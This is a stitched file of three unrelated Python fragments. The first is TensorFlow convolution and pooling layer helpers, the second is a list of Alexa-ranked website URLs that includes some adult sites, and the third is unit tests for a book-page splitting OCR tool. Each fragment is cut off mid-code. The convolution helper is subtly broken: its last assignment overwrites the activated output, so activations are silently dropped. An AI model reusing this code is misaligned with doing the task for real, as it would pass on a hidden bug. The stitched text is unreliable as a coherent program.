in_channels = int(x_input.get_shape()[-1])
kernel_shape = (kernel_size, kernel_size) if np.shape(kernel_size) == () else tuple(kernel_size)
kernel_shape += (in_channels, n_filters) # := [height, width, in_channels, out_channels]
# Create layer kernel (filters) and bias variables
kernel = tf.get_variable(
name='kernel', shape=kernel_shape, dtype=_globals.TF_FLOAT,
initializer=kernel_initializer, regularizer=kernel_regularizer)
bias = tf.get_variable(
name='bias', shape=(n_filters), dtype=_globals.TF_FLOAT,
initializer=bias_initializer, regularizer=bias_regularizer)
# Get stride shape from strides scalar or tuple
strides_shape = [1,] + ([strides, strides] if np.shape(strides) == () else list(strides)) + [1,]
# Return a tensor that computes linear/activated 2D convolution on the input plus a bias term
x_conv = tf.nn.conv2d(input=x_input,
filter=kernel,
strides=strides_shape,
padding=padding,
data_format='NHWC')
x_conv = tf.nn.bias_add(x_conv, bias)
if activation is not None:
x_out = activation(x_conv)
x_out = x_conv
return x_out if name is None else tf.identity(x_out, name=name)
def _pooling2d_layer(
x_input,
pooling_func,
pool_size,
strides=None,
padding='valid',
name=None):
"""
TODO(rpeloff) data format assumed to be "channels last" (i.e. [n_batch, height, width, in_channels])
"""
# Check the padding type is valid
padding = padding.upper()
padding_types = ['VALID', 'SAME']
if padding.upper() not in padding_types:
raise ValueError(
"Invalid padding type (case-insensitive): {}. "
"Expected one of: {}.".format(padding, padding_types))
# Get pooling window shape from pool_size scalar or tuple
pool_shape = [1,] + ([pool_size, pool_size] if np.shape(pool_size) == () else list(pool_size)) + [1,]
# Get stride shape from strides scalar or tuple, or pool_size if None
if strides is None:
strides = pool_size
strides_shape = [1,] + ([strides, strides] if np.shape(strides) == () else list(strides)) + [1,]
# Return a tensor that computes pooling2d func on the input
return pooling_func(value=x_input,
ksize=pool_shape,
strides=strides_shape,
padding=padding,
data_format='NHWC',
name=name)
def max_pooling2d_layer(
x_input,
pool_size,
strides=None,
padding='valid',
name=None):
"""
TODO(rpeloff) data format assumed to be "channels last" (i.e. [n_batch, height, width, in_channels])
TODO(rpeloff) stride=None uses pool_size as strides
"""
# Return a tensor that computes 2D max pooling on the input
return _pooling2d_layer(x_input=x_input,
pooling_func=tf.nn.max_pool,
pool_size=pool_size,
strides=strides,
padding=padding,
name=name)
def avg_pooling2d_layer(
x_input,
pool_size,
strides=None,
padding='valid',
name=None):
"""
TODO(rpeloff) data format assumed to be "channels last" (i.e. [n_batch, height, width, in_channels])
TODO(rpeloff) stride=None uses pool_size as strides
"""
# Return a tensor that computes 2D max pooling on the input
return _pooling2d_layer(x_input=x_input,
pooling_func=tf.nn.avg_pool,
pool_size=pool_size,
strides=strides,
padding=padding,
name=name)
def global_pooling2d_layer():
# TODO(rpeloff) max/Avg. Pooling across entire channel to produce output of shape [1, 1, channels_in]
# TODO(rpeloff) makes it easier to test different input padding lengths without calculating
# filter size for final pool layer over remaining units every time
pass
def convolutional_layers(
x_input,
input_shape, # tuple of (height, width, channels), e.g. (128, 128, 3) for 128x128 RGB images
# conv layers
n_layer_filters, # list of integers specifying number of output filters after each conv layer
layer_kernel_sizes, # list of integers/tuples specifying conv kernel size of cnn layer
layer_conv_strides=(1, 1), # integer/tuple, or list of integers/tuples
layer_conv_paddings='valid', # string or list of strings specifying conv padding of each cnn layer
# pooling
layer_pool_sizes=None, # list of integers/tuples specifying pool size of each cnn layer (None specifies no pooling in the cnn layers)
layer_pool_strides=None, # integer/tuple, or list of integers/tuples (None defaults to use layer_pool_size)
layer_pool_paddings='valid', # string or list of strings specifying pool padding of each cnn layer
layer_pool_type='max', # String, one of ['max', 'avg', 'avg_last'], specifying pool type in the cnn layers
# general
activation=None, # callable, or list of callables specifying activation after conv in each cnn layer
kernel_initializer=None, # None specifies tf.get_variable default initializer (Likely tf.glorot_uniform_initializer)
bias_initializer=tf.zeros_initializer(),
kernel_regularizer=None,
bias_regularizer=None,
# regularization
keep_prob=None, # float, include dropout layers after cnn layers with specified keep probability (None specifies no dropout layers)
drop_channels=None, # boolean, specifies whether to dropout spatially (i.e. dropout entire channels) instead of standard dropout
# NOTE: None & False same, default None so reader is not confused since dropout must be activated by specifying keep_prob
batch_norm=None, # One of [None, 'before', 'after'], specifies whether to use batch norm before or after the activation function in cnn layers
bn_option_dict=None, # Additional keyword arg dict of options for tf.layers.batch_normalization (see fused option!)
training=False, # boolean or tf.placeholder to control whether the graph is being used during training or inference
debug=False,
layer_var_scope_prefix='cnn_layer'):
"""
TODO(rpeloff) for batch_norm='after', see: https://github.com/ducha-aiki/caffenet-benchmark/blob/master/batchnorm.md
TODO(rpeloff) example usage for MNIST simulation:
>>> import mltoolset as ml
>>> import tensorflow as tf
>>> import numpy as np
>>> n_data = 5
>>> n_inputs = 28*28
>>> data = np.asarray(np.random.rand(n_data, n_inputs), dtype=NP_DTYPE)
>>> x_input = tf.placeholder(ml.TF_FLOAT, [None, n_inputs])
>>> input_shape = [28, 28, 1]
>>> n_layer_filters = [32, 32, 64, 64, 128]
>>> filter_sizes = [
# 1st cnn stack (can specify as tuple)
(3, 3), # filter shape of first layer: 32 filters with shape 3x3x1 = 288 weights
(3, 3), # filter shape of second layer: 32 filters with shape 3x3x32 = 9,216 weights
# 2nd cnn stack (can specify as integers)
3, # filter shape of third layer: 64 filters with shape 3x3x32 = 18,432 weights
3, # filter shape of fourth layer: 64 filters with shape 3x3x64 = 36,864 weights
# 3rd cnn stack (can specify as list)
[3, 3] # filter shape of fifth layer: 128 filters with shape 3x3x64 = 73,728 weights
| |
global
'http://www.govome.com/',
# Why: #1515 in Alexa global
'http://www.copyscape.com/',
# Why: #1516 in Alexa global
'http://www.minecraftforum.net/',
# Why: #1517 in Alexa global
'http://www.mit.edu/',
# Why: #1518 in Alexa global
'http://www.cvs.com/',
# Why: #1519 in Alexa global
'http://www.timesjobs.com/',
# Why: #1520 in Alexa global
'http://www.ksl.com/',
# Why: #1521 in Alexa global
'http://www.verizon.net/',
# Why: #1522 in Alexa global
'http://www.direct.gov.uk/',
# Why: #1523 in Alexa global
'http://www.miralinks.ru/',
# Why: #1524 in Alexa global
'http://www.elheddaf.com/',
# Why: #1525 in Alexa global
'http://www.stockphoto9.com/',
# Why: #1526 in Alexa global
'http://www.ashemaletube.com/',
# Why: #1527 in Alexa global
'http://www.dmm.com/',
# Why: #1528 in Alexa global
'http://www.abckj123.com/',
# Why: #1529 in Alexa global
'http://www.smzdm.com/',
# Why: #1530 in Alexa global
'http://www.china.cn/',
# Why: #1531 in Alexa global
'http://www.cox.com/',
# Why: #1532 in Alexa global
'http://www.welt.de/',
# Why: #1533 in Alexa global
'http://www.guyspy.com/',
# Why: #1534 in Alexa global
'http://www.makeuseof.com/',
# Why: #1535 in Alexa global
'http://www.tiscali.it/',
# Why: #1536 in Alexa global
'http://www.178.com/',
# Why: #1537 in Alexa global
'http://www.metrolyrics.com/',
# Why: #1538 in Alexa global
'http://www.vsuch.com/',
# Why: #1539 in Alexa global
'http://www.seosprint.net/',
# Why: #1540 in Alexa global
'http://www.samanyoluhaber.com/',
# Why: #1541 in Alexa global
'http://www.garanti.com.tr/',
# Why: #1542 in Alexa global
'http://www.chicagotribune.com/',
# Why: #1543 in Alexa global
'http://www.hinet.net/',
# Why: #1544 in Alexa global
'http://www.kp.ru/',
# Why: #1545 in Alexa global
'http://www.chomikuj.pl/',
# Why: #1546 in Alexa global
'http://www.nk.pl/',
# Why: #1547 in Alexa global
'http://www.webhostingtalk.com/',
# Why: #1548 in Alexa global
'http://www.dnaindia.com/',
# Why: #1550 in Alexa global
'http://www.programme-tv.net/',
# Why: #1551 in Alexa global
'http://www.ievbz.com/',
# Why: #1552 in Alexa global
'http://www.mysql.com/',
# Why: #1553 in Alexa global
'http://www.perfectmoney.is/',
# Why: #1554 in Alexa global
'http://www.liveundnackt.com/',
# Why: #1555 in Alexa global
'http://www.flippa.com/',
# Why: #1556 in Alexa global
'http://www.vevo.com/',
# Why: #1557 in Alexa global
'http://www.jappy.de/',
# Why: #1558 in Alexa global
'http://www.bidvertiser.com/',
# Why: #1559 in Alexa global
'http://www.bankmandiri.co.id/',
# Why: #1560 in Alexa global
'http://www.letour.fr/',
# Why: #1561 in Alexa global
'http://www.yr.no/',
# Why: #1562 in Alexa global
'http://www.suning.com/',
# Why: #1563 in Alexa global
'http://www.nosub.tv/',
# Why: #1564 in Alexa global
'http://www.delicious.com/',
# Why: #1565 in Alexa global
'http://www.pornpoly.com/',
# Why: #1566 in Alexa global
'http://www.echo.msk.ru/',
# Why: #1567 in Alexa global
'http://www.coingeneration.com/',
# Why: #1568 in Alexa global
'http://www.shutterfly.com/',
# Why: #1569 in Alexa global
'http://www.royalbank.com/',
# Why: #1570 in Alexa global
'http://www.techradar.com/',
# Why: #1571 in Alexa global
'http://www.114la.com/',
# Why: #1572 in Alexa global
'http://www.bizrate.com/',
# Why: #1573 in Alexa global
'http://www.srvey.net/',
# Why: #1574 in Alexa global
'http://www.heavy-r.com/',
# Why: #1575 in Alexa global
'http://www.telexfree.com/',
# Why: #1576 in Alexa global
'http://www.lego.com/',
# Why: #1577 in Alexa global
'http://www.battlefield.com/',
# Why: #1578 in Alexa global
'http://www.shahrekhabar.com/',
# Why: #1579 in Alexa global
'http://www.tuenti.com/',
# Why: #1580 in Alexa global
'http://www.bookmyshow.com/',
# Why: #1581 in Alexa global
'http://www.gamme.com.tw/',
# Why: #1582 in Alexa global
'http://www.ft.com/',
# Why: #1583 in Alexa global
'http://www.prweb.com/',
# Why: #1584 in Alexa global
'http://www.1337x.org/',
# Why: #1585 in Alexa global
'http://www.networkedblogs.com/',
# Why: #1586 in Alexa global
'http://www.pbskids.org/',
# Why: #1587 in Alexa global
'http://aipai.com/',
# Why: #1588 in Alexa global
'http://www.jang.com.pk/',
# Why: #1589 in Alexa global
'http://www.dribbble.com/',
# Why: #1590 in Alexa global
'http://www.ezdownloadpro.info/',
# Why: #1591 in Alexa global
'http://www.gonzoxxxmovies.com/',
# Why: #1592 in Alexa global
'http://www.aufeminin.com/',
# Why: #1594 in Alexa global
'http://www.6pm.com/',
# Why: #1596 in Alexa global
'http://www.azet.sk/',
# Why: #1597 in Alexa global
'http://www.trustedoffer.com/',
# Why: #1598 in Alexa global
'http://www.simplyhired.com/',
# Why: #1599 in Alexa global
'http://www.adserverpub.com/',
# Why: #1600 in Alexa global
'http://www.privalia.com/',
# Why: #1601 in Alexa global
'http://www.bedbathandbeyond.com/',
# Why: #1602 in Alexa global
'http://www.yyets.com/',
# Why: #1603 in Alexa global
'http://verycd.com/',
# Why: #1604 in Alexa global
'http://www.sbnation.com/',
# Why: #1605 in Alexa global
'http://www.blogspot.nl/',
# Why: #1606 in Alexa global
'http://www.ikariam.com/',
# Why: #1607 in Alexa global
'http://www.sitepoint.com/',
# Why: #1608 in Alexa global
'http://www.gazeta.ru/',
# Why: #1609 in Alexa global
'http://www.tataindicom.com/',
# Why: #1610 in Alexa global
'http://chekb.com/',
# Why: #1611 in Alexa global
'http://www.literotica.com/',
# Why: #1612 in Alexa global
'http://www.ah-me.com/',
# Why: #1613 in Alexa global
'http://eztv.it/',
# Why: #1614 in Alexa global
'http://www.onliner.by/',
# Why: #1615 in Alexa global
'http://pptv.com/',
# Why: #1616 in Alexa global
'http://www.macrumors.com/',
# Why: #1617 in Alexa global
'http://www.xvideo-jp.com/',
# Why: #1618 in Alexa global
'http://www.state.tx.us/',
# Why: #1619 in Alexa global
'http://www.jamnews.ir/',
# Why: #1620 in Alexa global
'http://etoro.com/',
# Why: #1621 in Alexa global
'http://www.ny.gov/',
# Why: #1622 in Alexa global
'http://www.searchenginewatch.com/',
# Why: #1623 in Alexa global
'http://www.google.co.cr/',
# Why: #1624 in Alexa global
'http://www.td.com/',
# Why: #1625 in Alexa global
'http://www.ahrefs.com/',
# Why: #1626 in Alexa global
'http://www.337.com/',
# Why: #1627 in Alexa global
'http://www.klout.com/',
# Why: #1628 in Alexa global
'http://www.ebay.es/',
# Why: #1629 in Alexa global
'http://www.theverge.com/',
# Why: #1631 in Alexa global
'http://www.kapook.com/',
# Why: #1632 in Alexa global
'http://www.barclays.co.uk/',
# Why: #1634 in Alexa global
'http://nuomi.com/',
# Why: #1635 in Alexa global
'http://www.index-of-mp3s.com/',
# Why: #1636 in Alexa global
'http://www.ohfreesex.com/',
# Why: #1637 in Alexa global
'http://www.mts.ru/',
# Why: #1638 in Alexa global
'http://www.itmedia.co.jp/',
# Why: #1639 in Alexa global
'http://www.instantcheckmate.com/',
# Why: #1640 in Alexa global
'http://www.sport.es/',
# Why: #1641 in Alexa global
'http://www.sitescout.com/',
# Why: #1642 in Alexa global
'http://www.irr.ru/',
# Why: #1643 in Alexa global
'http://tuniu.com/',
# Why: #1644 in Alexa global
'http://www.startimes.com/',
# Why: #1645 in Alexa global
'http://www.tvn24.pl/',
# Why: #1646 in Alexa global
'http://www.kenh14.vn/',
# Why: #1647 in Alexa global
'http://www.myvideo.de/',
# Why: #1648 in Alexa global
'http://www.speedbit.com/',
# Why: #1649 in Alexa global
'http://www.aljazeera.com/',
# Why: #1650 in Alexa global
'http://www.pudelek.pl/',
# Why: #1651 in Alexa global
'http://www.mmgp.ru/',
# Why: #1652 in Alexa global
'http://www.empflix.com/',
# Why: #1653 in Alexa global
'http://www.tigerdirect.com/',
# Why: #1655 in Alexa global
'http://www.elegantthemes.com/',
# Why: #1657 in Alexa global
'http://www.ted.com/',
# Why: #1658 in Alexa global
'http://www.carview.co.jp/',
# Why: #1659 in Alexa global
'http://www.down1oads.com/',
# Why: #1660 in Alexa global
'http://www.bancobrasil.com.br/',
# Why: #1661 in Alexa global
'http://www.qip.ru/',
# Why: #1662 in Alexa global
'http://www.nikkeibp.co.jp/',
# Why: #1663 in Alexa global
'http://www.fapdu.com/',
# Why: #1664 in Alexa global
'http://www.softango.com/',
# Why: #1665 in Alexa global
'http://www.ap.org/',
# Why: #1666 in Alexa global
'http://www.meteofrance.com/',
# Why: #1667 in Alexa global
'http://www.gentenocturna.com/',
# Why: #1668 in Alexa global
'http://www.2ch-c.net/',
# Why: #1669 in Alexa global
'http://www.orf.at/',
# Why: #1670 in Alexa global
'http://www.maybank2u.com.my/',
# Why: #1671 in Alexa global
'http://www.minecraftwiki.net/',
# Why: #1672 in Alexa global
'http://www.tv.com/',
# Why: #1673 in Alexa global
'http://www.orkut.com/',
# Why: #1674 in Alexa global
'http://www.adp.com/',
# Why: #1675 in Alexa global
'http://www.woorank.com/',
# Why: #1676 in Alexa global
'http://www.imagetwist.com/',
# Why: #1677 in Alexa global
'http://www.pastebin.com/',
# Why: #1678 in Alexa global
'http://www.airtel.com/',
# Why: #1679 in Alexa global
'http://www.ew.com/',
# Why: #1680 in Alexa global
'http://www.forever21.com/',
# Why: #1681 in Alexa global
'http://www.adam4adam.com/',
# Why: #1682 in Alexa global
'http://www.voyages-sncf.com/',
# Why: #1683 in Alexa global
'http://www.nextag.com/',
# Why: #1684 in Alexa global
'http://www.usnews.com/',
# Why: #1685 in Alexa global
'http://www.dinamalar.com/',
# Why: #1686 in Alexa global
'http://www.impress.co.jp/',
# Why: #1687 in Alexa global
'http://www.virginmedia.com/',
# Why: #1688 in Alexa global
'http://www.investopedia.com/',
# Why: #1689 in Alexa global
'http://www.seekingalpha.com/',
# Why: #1690 in Alexa global
'http://www.jumponhottie.com/',
# Why: #1691 in Alexa global
'http://www.national-lottery.co.uk/',
# Why: #1692 in Alexa global
'http://www.mobifiesta.com/',
# Why: #1693 in Alexa global
'http://www.kapanlagi.com/',
# Why: #1694 in Alexa global
'http://www.segundamano.es/',
# Why: #1695 in Alexa global
'http://gfan.com/',
# Why: #1696 in Alexa global
'http://www.xdating.com/',
# Why: #1697 in Alexa global
'http://www.ynet.com/',
# Why: #1698 in Alexa global
'http://www.medu.ir/',
# Why: #1699 in Alexa global
'http://www.hsn.com/',
# Why: #1700 in Alexa global
'http://www.newsru.com/',
# Why: #1701 in Alexa global
'http://www.minus.com/',
# Why: #1702 in Alexa global
'http://www.sitetalk.com/',
# Why: #1703 in Alexa global
'http://www.aarp.org/',
# Why: #1704 in | |
<reponame>bansan85/ocr-book-tests<gh_stars>0
import unittest
import numpy as np
from diptych.angle import Angle
from diptych.cv2ext import charge_image
from diptych.fsext import get_absolute_from_current_path
from diptych.print_interface import ConstString
from tests.mock_separate_page import MockDisableSeparatePage
np.seterr(all="raise")
tc = unittest.TestCase()
MAX_VAL = 6
FUZZING = False
def test_0001_png() -> None:
"""first good page"""
MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(
get_absolute_from_current_path(__file__, "0001.png"),
{
ConstString.separation_double_page_angle(): (
"range",
Angle.deg(90.42),
Angle.deg(90.68),
),
ConstString.separation_double_page_y(): ("range", 2480, 2489),
ConstString.page_rotation(1): (
"range",
Angle.deg(0.49),
Angle.deg(0.81),
),
ConstString.page_rotation(2): (
"range",
Angle.deg(0.09),
Angle.deg(0.21),
),
ConstString.image_crop(1, "x1"): ("range", 325, 332),
ConstString.image_crop(1, "y1"): ("range", 334, 337),
ConstString.image_crop(1, "x2"): ("range", 2342, 2347),
ConstString.image_crop(1, "y2"): ("range", 3221, 3223),
ConstString.image_crop(2, "x1"): ("range", 165, 175),
ConstString.image_crop(2, "y1"): ("range", 648, 649),
ConstString.image_crop(2, "x2"): ("range", 2180, 2190),
ConstString.image_crop(2, "y2"): ("range", 3360, 3362),
ConstString.image_dpi(1): ("difference", 300, 0.0000001),
ConstString.image_border(1, 1): ("range", 317, 340),
ConstString.image_border(1, 2): ("range", 260, 282),
ConstString.image_border(1, 3): ("range", 219, 225),
ConstString.image_border(1, 4): ("range", 219, 225),
ConstString.image_dpi(2): ("difference", 300, 0.0000001),
ConstString.image_border(2, 1): ("range", 638, 674),
ConstString.image_border(2, 2): ("range", 101, 136),
ConstString.image_border(2, 3): ("range", 221, 224),
ConstString.image_border(2, 4): ("range", 221, 224),
},
)
def test_2_pages_2_contours_png() -> None:
"""There is not one contour for the two pages,
but one contour for each page.
"""
MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(
get_absolute_from_current_path(__file__, "2-pages-2-contours.png"),
{
ConstString.separation_double_page_angle(): (
"range",
Angle.deg(89.91),
Angle.deg(90.32),
),
ConstString.separation_double_page_y(): ("range", 2486, 2492),
ConstString.page_rotation(1): (
"range",
Angle.deg(-0.11),
Angle.deg(0.21),
),
ConstString.page_rotation(2): (
"range",
Angle.deg(0.04),
Angle.deg(0.41),
),
ConstString.image_crop(1, "x1"): ("range", 1181, 1199),
ConstString.image_crop(1, "y1"): ("range", 1719, 1751),
ConstString.image_crop(1, "x2"): ("range", 1182, 1200),
ConstString.image_crop(1, "y2"): ("range", 1720, 1752),
ConstString.image_crop(2, "x1"): ("range", 89, 114),
ConstString.image_crop(2, "y1"): ("range", 240, 241),
ConstString.image_crop(2, "x2"): ("range", 2136, 2159),
ConstString.image_crop(2, "y2"): ("range", 3239, 3242),
ConstString.image_dpi(1): ("difference", 300, 0.0000001),
ConstString.image_border(1, 1): ("range", 1752, 1753),
ConstString.image_border(1, 2): ("range", 1753, 1753),
ConstString.image_border(1, 3): ("range", 1239, 1239),
ConstString.image_border(1, 4): ("range", 1239, 1239),
ConstString.image_dpi(2): ("difference", 300, 0.0000001),
ConstString.image_border(2, 1): ("range", 226, 240),
ConstString.image_border(2, 2): ("range", 248, 262),
ConstString.image_border(2, 3): ("range", 203, 207),
ConstString.image_border(2, 4): ("range", 203, 207),
},
)
def test_black_border_not_removed_png() -> None:
"""The border on the right is still there."""
MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(
get_absolute_from_current_path(
__file__, "black-border-not-removed.png"
),
{
ConstString.separation_double_page_angle(): (
"range",
Angle.deg(89.95),
Angle.deg(90.1),
),
ConstString.separation_double_page_y(): ("range", 2451, 2458),
ConstString.page_rotation(1): (
"range",
Angle.deg(-0.11),
Angle.deg(0.21),
),
ConstString.page_rotation(2): (
"range",
Angle.deg(-0.21),
Angle.deg(0.16),
),
ConstString.image_crop(1, "x1"): ("range", 294, 299),
ConstString.image_crop(1, "y1"): ("range", 139, 144),
ConstString.image_crop(1, "x2"): ("range", 2305, 2312),
ConstString.image_crop(1, "y2"): ("range", 3345, 3349),
ConstString.image_crop(2, "x1"): ("range", 153, 159),
ConstString.image_crop(2, "y1"): ("range", 143, 146),
ConstString.image_crop(2, "x2"): ("range", 2168, 2173),
ConstString.image_crop(2, "y2"): ("range", 3350, 3353),
ConstString.image_dpi(1): ("difference", 300, 0.0000001),
ConstString.image_border(1, 1): ("range", 127, 137),
ConstString.image_border(1, 2): ("range", 145, 157),
ConstString.image_border(1, 3): ("range", 221, 226),
ConstString.image_border(1, 4): ("range", 221, 226),
ConstString.image_dpi(2): ("difference", 300, 0.0000001),
ConstString.image_border(2, 1): ("range", 130, 139),
ConstString.image_border(2, 2): ("range", 141, 151),
ConstString.image_border(2, 3): ("range", 222, 224),
ConstString.image_border(2, 4): ("range", 222, 224),
},
)
def test_image_failed_to_rotate_png() -> None:
"""Failed to compute angle to rotate. The image takes the whole page."""
MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(
get_absolute_from_current_path(__file__, "image_failed_to_rotate.png"),
{
ConstString.separation_double_page_angle(): (
"range",
Angle.deg(90.07),
Angle.deg(90.50),
),
ConstString.separation_double_page_y(): ("range", 2476, 2488),
ConstString.page_rotation(1): (
"range",
Angle.deg(-0.01),
Angle.deg(0.66),
),
ConstString.page_rotation(2): (
"range",
Angle.deg(0.19),
Angle.deg(0.51),
),
ConstString.image_crop(1, "x1"): ("range", 19, 91),
ConstString.image_crop(1, "y1"): ("range", 1, 23),
ConstString.image_crop(1, "x2"): ("range", 2456, 2486),
ConstString.image_crop(1, "y2"): ("range", 3483, 3505),
ConstString.image_crop(2, "x1"): ("range", 159, 183),
ConstString.image_crop(2, "y1"): ("range", 231, 236),
ConstString.image_crop(2, "x2"): ("range", 2242, 2261),
ConstString.image_crop(2, "y2"): ("range", 3354, 3359),
ConstString.image_dpi(1): ("difference", 300, 0.0000001),
ConstString.image_border(1, 1): ("range", 2, 19),
ConstString.image_border(1, 2): ("range", 2, 19),
ConstString.image_border(1, 3): ("range", 10, 55),
ConstString.image_border(1, 4): ("range", 10, 55),
ConstString.image_dpi(2): ("difference", 300, 0.0000001),
ConstString.image_border(2, 1): ("range", 206, 228),
ConstString.image_border(2, 2): ("range", 140, 160),
ConstString.image_border(2, 3): ("range", 186, 192),
ConstString.image_border(2, 4): ("range", 186, 192),
},
)
def test_image_failed_to_crop_data_png() -> None:
"""Failed to detect edges. The image takes the whole page and is too closed
to the border of the image.
"""
MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(
get_absolute_from_current_path(
__file__, "image_failed_to_crop_data.png"
),
{
ConstString.separation_double_page_angle(): (
"range",
Angle.deg(89.86),
Angle.deg(90.20),
),
ConstString.separation_double_page_y(): ("range", 2477, 2486),
ConstString.page_rotation(1): (
"range",
Angle.deg(-0.16),
Angle.deg(0.21),
),
ConstString.page_rotation(2): (
"range",
Angle.deg(-0.01),
Angle.deg(0.21),
),
ConstString.image_crop(1, "x1"): ("range", 40, 116),
ConstString.image_crop(1, "y1"): ("range", 1, 13),
ConstString.image_crop(1, "x2"): ("range", 2469, 2483),
ConstString.image_crop(1, "y2"): ("range", 3499, 3505),
ConstString.image_crop(2, "x1"): ("range", 155, 168),
ConstString.image_crop(2, "y1"): ("range", 217, 220),
ConstString.image_crop(2, "x2"): ("range", 2235, 2248),
ConstString.image_crop(2, "y2"): ("range", 3348, 3350),
ConstString.image_dpi(1): ("difference", 300, 0.0000001),
ConstString.image_border(1, 1): ("range", 2, 11),
ConstString.image_border(1, 2): ("range", 2, 11),
ConstString.image_border(1, 3): ("range", 19, 58),
ConstString.image_border(1, 4): ("range", 19, 58),
ConstString.image_dpi(2): ("difference", 300, 0.0000001),
ConstString.image_border(2, 1): ("range", 205, 225),
ConstString.image_border(2, 2): ("range", 129, 151),
ConstString.image_border(2, 3): ("range", 189, 192),
ConstString.image_border(2, 4): ("range", 189, 192),
},
)
def test_wrong_angle_split_line_png() -> None:
"""Failed to detect edges. The image takes the whole page and is too closed
to the border of the image.
"""
MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(
get_absolute_from_current_path(__file__, "wrong_angle_split_line.png"),
{
ConstString.separation_double_page_angle(): (
"range",
Angle.deg(90.00),
Angle.deg(90.22),
),
ConstString.separation_double_page_y(): ("range", 2476, 2487),
ConstString.page_rotation(1): (
"range",
Angle.deg(-0.16),
Angle.deg(0.21),
),
ConstString.page_rotation(2): (
"range",
Angle.deg(-0.01),
Angle.deg(0.21),
),
ConstString.image_crop(1, "x1"): ("range", 28, 61),
ConstString.image_crop(1, "y1"): ("range", 1, 10),
ConstString.image_crop(1, "x2"): ("range", 2470, 2485),
ConstString.image_crop(1, "y2"): ("range", 3500, 3505),
ConstString.image_crop(2, "x1"): ("range", 154, 171),
ConstString.image_crop(2, "y1"): ("range", 217, 219),
ConstString.image_crop(2, "x2"): ("range", 2237, 2249),
ConstString.image_crop(2, "y2"): ("range", 3348, 3350),
ConstString.image_dpi(1): ("difference", 300, 0.0000001),
ConstString.image_border(1, 1): ("range", 2, 8),
ConstString.image_border(1, 2): ("range", 2, 8),
ConstString.image_border(1, 3): ("range", 15, 34),
ConstString.image_border(1, 4): ("range", 15, 34),
ConstString.image_dpi(2): ("difference", 300, 0.0000001),
ConstString.image_border(2, 1): ("range", 195, 219),
ConstString.image_border(2, 2): ("range", 136, 159),
ConstString.image_border(2, 3): ("range", 188, 192),
ConstString.image_border(2, 4): ("range", 188, 192),
},
)
tc.assertEqual(
charge_image(
get_absolute_from_current_path(
__file__, "wrong_angle_split_line.png_page_1.png"
)
).shape[2],
3,
)
def test_angle_page_lower_split_line_png() -> None:
"""Failed when angle of a page in lower than
the angle of the split line.
"""
MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(
get_absolute_from_current_path(
__file__, "angle_page_lower_split_line.png"
),
{
ConstString.separation_double_page_angle(): (
"range",
Angle.deg(89.71),
Angle.deg(89.81),
),
ConstString.separation_double_page_y(): ("range", 2470, 2475),
ConstString.page_rotation(1): (
"range",
Angle.deg(-0.46),
Angle.deg(-0.14),
),
ConstString.page_rotation(2): (
"range",
Angle.deg(0.04),
Angle.deg(0.21),
),
ConstString.image_crop(1, "x1"): ("range", 241, 245),
ConstString.image_crop(1, "y1"): ("range", 156, 161),
ConstString.image_crop(1, "x2"): ("range", 2350, 2357),
ConstString.image_crop(1, "y2"): ("range", 3364, 3368),
ConstString.image_crop(2, "x1"): ("range", 136, 154),
ConstString.image_crop(2, "y1"): ("range", 145, 147),
ConstString.image_crop(2, "x2"): ("range", 2243, 2264),
ConstString.image_crop(2, "y2"): ("range", 3350, 3352),
ConstString.image_dpi(1): ("difference", 300, 0.0000001),
ConstString.image_border(1, 1): ("range", 130, 147),
ConstString.image_border(1, 2): ("range", 135, 152),
ConstString.image_border(1, 3): ("range", 172, 177),
ConstString.image_border(1, 4): ("range", 172, 177),
ConstString.image_dpi(2): ("difference", 300, 0.0000001),
ConstString.image_border(2, 1): ("range", 116, 132),
ConstString.image_border(2, 2): ("range", 151, 168),
ConstString.image_border(2, 3): ("range", 174, 176),
ConstString.image_border(2, 4): ("range", 174, 176),
},
)
def test_wrong_split_line_png() -> None:
"""Improve choice of the split line between different algorithm."""
MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(
get_absolute_from_current_path(__file__, "wrong_split_line.png"),
{
ConstString.separation_double_page_angle(): (
"range",
Angle.deg(89.80),
Angle.deg(89.99),
),
ConstString.separation_double_page_y(): ("range", 2461, 2471),
ConstString.page_rotation(1): (
"range",
Angle.deg(-0.16),
Angle.deg(0.01),
),
ConstString.page_rotation(2): (
"range",
Angle.deg(0.19),
Angle.deg(0.71),
),
ConstString.image_crop(1, "x1"): ("range", 211, 213),
ConstString.image_crop(1, "y1"): ("range", 155, 157),
ConstString.image_crop(1, "x2"): ("range", 2322, 2324),
ConstString.image_crop(1, "y2"): ("range", 3362, 3363),
ConstString.image_crop(2, "x1"): ("range", 115, 129),
ConstString.image_crop(2, "y1"): ("range", 160, 167),
ConstString.image_crop(2, "x2"): ("range", 2230, 2243),
ConstString.image_crop(2, "y2"): ("range", 3371, 3378),
ConstString.image_dpi(1): ("difference", 300, 0.0000001),
ConstString.image_border(1, 1): ("range", 115, 180),
ConstString.image_border(1, 2): ("range", 100, 167),
ConstString.image_border(1, 3): ("range", 173, 175),
ConstString.image_border(1, 4): ("range", 173, 175),
ConstString.image_dpi(2): ("difference", 300, 0.0000001),
ConstString.image_border(2, 1): ("range", 129, 148),
ConstString.image_border(2, 2): ("range", 129, 152),
ConstString.image_border(2, 3): ("range", 168, 174),
ConstString.image_border(2, 4): ("range", 168, 174),
},
)
def test_crop_too_much_png() -> None:
"""Reduce distance to ignore black area closed to the edge."""
MockDisableSeparatePage(MAX_VAL, FUZZING).treat_file(
get_absolute_from_current_path(__file__, "crop_too_much.png"),
{
ConstString.separation_double_page_angle(): (
"range",
Angle.deg(90.03),
Angle.deg(90.47),
),
ConstString.separation_double_page_y(): ("range", 2452, 2463),
ConstString.page_rotation(1): (
"range",
Angle.deg(-0.16),
Angle.deg(0.16),
),
ConstString.page_rotation(2): (
"range",
Angle.deg(0.19),
Angle.deg(0.51),
),
ConstString.image_crop(1, "x1"): ("range", 300, 303),
ConstString.image_crop(1, "y1"): ("range", 145, 148),
ConstString.image_crop(1, "x2"): ("range", 2313, 2317),
ConstString.image_crop(1, "y2"): ("range", 3350, 3353),
ConstString.image_crop(2, "x1"): ("range", 158, 180),
ConstString.image_crop(2, "y1"): ("range", 151, 156),
ConstString.image_crop(2, "x2"): ("range", 2176, 2192),
